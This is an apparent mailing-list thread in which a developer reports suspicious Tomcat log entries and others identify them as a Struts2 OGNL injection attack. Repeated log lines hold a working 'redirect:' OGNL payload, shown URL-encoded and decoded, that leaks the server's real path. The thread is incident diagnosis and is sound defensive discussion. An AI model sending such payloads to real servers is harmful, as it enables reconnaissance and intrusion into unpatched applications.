This is the vulnerability that was addressed in Struts 2.3.15.1.
On Thu, Jan 30, 2014 at 2:36 PM, JOSE L MARTINEZ-AVIAL <jlm...@gmail.com>wrote: > What version of Struts are you using? It seems > > 60.15.137.72 - - [27/Jan/2014:17:51:48 +0530] "GET > > /common/test2.action?redirect:$%7B%23a%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletRequest'),%23b%3d%23a.getRealPath(%22/%22),%23matt%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),%23matt.getWriter().println(%23b),%23matt.getWriter().flush(),%23matt.getWriter().close()%7D > HTTP/1.0" 200 74 > > transforms to > > 60.15.137.72 - - [27/Jan/2014:17:51:48 +0530] "GET > > /common/test2.action?redirect:${#a=#context.get('com.opensymphony.xwork2.dispatcher.HttpServletRequest'),#b=#a.getRealPath("/"),#matt=#context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),#matt.getWriter().println(#b),#matt.getWriter().flush(),#matt.getWriter().close()} > HTTP/1.0" 200 74 > > That basically returns on the response the real path of your application. > > > > > > 2014-01-30 Amol Ghotankar <ghotankaru...@gmail.com> > > > I have seen some sample app for testing which was developed using > struts2. > > > > I saw some unknow files getting uploaded on test, > > > > I initially thought that my tomcat was hacked or my server was hacked but > > now after a close analysis it looks a struts2 webwork secuirty issue or > > vulenrability or may me my miss configurations or something not sure > > > > Can any one in struts2 team fix this gloabally and help me to get rid of > > this locally without version upgrades..... > > > > Here are the tomcat logs which clearly says the story > > > > 60.15.137.72 - - [27/Jan/2014:17:51:48 +0530] "GET > > > > > /common/test.action?redirect:$%7B%23a%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletRequest'),%23b%3d%23a.getRealPath(%22/%22),%23matt%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),%23matt.getWriter().println(%23b),%23matt.getWriter().flush(),%23matt.getWriter().close()%7D > > HTTP/1.0" 200 74 > > > > 60.15.137.72 - - [27/Jan/2014:17:51:48 +0530] "GET > > > > > /common/test2.action?redirect:$%7B%23a%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletRequest'),%23b%3d%23a.getRealPath(%22/%22),%23matt%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),%23matt.getWriter().println(%23b),%23matt.getWriter().flush(),%23matt.getWriter().close()%7D > > HTTP/1.0" 200 74 > > > > 60.15.137.72 - - [27/Jan/2014:17:51:49 +0530] "GET > > > > > /common/test3.action?redirect:$%7B%23a%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletRequest'),%23b%3d%23a.getRealPath(%22/%22),%23matt%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),%23matt.getWriter().println(%23b),%23matt.getWriter().flush(),%23matt.getWriter().close()%7D > > HTTP/1.0" 200 74 > > > > > > I hope my issue is clear and valid. > > > > Original issue on stackoverflow at > > > > > http://stackoverflow.com/questions/21104956/tomcat-files-getting-uploaded-security-loophole > > > > > > > > > > -- > > > > > > > > *With Best Regards,* > > > > Amol Ghotankar > > Technical Lead > > M: +91 9960 980 419 <http://www.cursivetech.com> > > >